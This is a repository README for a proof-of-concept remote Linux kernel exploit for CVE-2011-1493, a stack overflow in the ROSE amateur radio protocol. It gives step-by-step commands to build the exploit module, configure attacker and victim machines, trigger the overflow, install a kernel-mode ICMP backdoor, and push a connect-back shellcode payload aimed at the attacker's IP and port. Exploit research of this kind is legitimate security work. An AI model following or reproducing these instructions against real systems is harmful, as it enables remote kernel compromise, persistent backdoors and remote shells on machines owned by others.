C Assembly Other
Fetching latest commit…
Cannot retrieve the latest commit at this time.
|Failed to load latest commit information.|
******************************** * ROSE remote kernel exploit * * by Dan Rosenberg (@djrbliss) * ******************************** This is an exploit for CVE-2011-1493, a remote stack overflow in the Linux implementation of the ROSE amateur radio protocol. THIS IS PROOF OF CONCEPT. It should work very reliably on the kernel I tested (Ubuntu Server 10.04), but I make no promises about other kernels. Obviously, any hard-coded addresses and offsets (in payload.h) must be adjusted for the targeted kernel. Before running this, you'll need the ax25-tools package and the kernel headers for the attacker machine's kernel. The directory structure and instructions are as follows: module/ The actual exploit, included as a modification to the original ROSE kernel module. This should be built against the attack machine's kernel by running: $ make -C /lib/modules/$(uname -r)/build SUBDIRS=$PWD modules This will work out of the box on some kernels. If this fails to compile against your kernel, download the appropriate ROSE kernel module for your kernel and make the following modifications: 1. Add an #include "payload.h" in rose_subr.c. 2. Copy-paste the rose_create_facilities() function from the included module into the new rose_subr.c. 3. Copy the .S assembly files, payload.c, and payload.h into the new directory. 4. Copy the Makefile into the new directory. At this point, the module should build against your kernel, resulting in a rose.ko file. conf/ Configuration files necessary for setting up a ROSE stack. Extract server-conf.tar.gz to the root directory of the victim machine (as root), and extract client-conf.tar.gz to the root directory of the attacker machine (as root). scripts/ Scripts to configure and enable the ROSE stacks. Before using the client script, edit it and replace the path to the ROSE kernel module with the full path of the recently compiled exploit module (rose.ko). When you are ready to run the exploit, run ./rose_server.sh as root on the victim machine, and ./rose_client.sh as root on the attacker machine. Next, to run the exploit and install a kernel-mode ICMP backdoor into the victim machine, run the following: $ rose_call rose ELITE-1 LOSER-1 6060606060 This will place a ROSE connection from the attacker to the victim. This connection will hang, so you'll need to ctrl+c the rose_call command. icmp/ The code for installing and triggering payloads using the ICMP backdoor. First, compile magicping.c: $ gcc magicping.c -o magicping This tool must be run as root or with CAP_NET_RAW (in order to open a raw socket for our ICMP packets). One sample payload is provided: connect.S, a standard connect-back shellcode. Also included is a calibrate.py script, which will allow you to easily modify connect.S to point to your IP and port. The payload can be prepared as follows: $ as connect.S -o connect.out $ objcopy -O binary -j .text connect.out connect.o The payload can then be installed on the remote kernel as follows: $ ./magicping -i connect.o [remote ip] This payload can be triggered by hooking a system call of choice as follows: $ ./magicping -t [syscall number] [remote ip]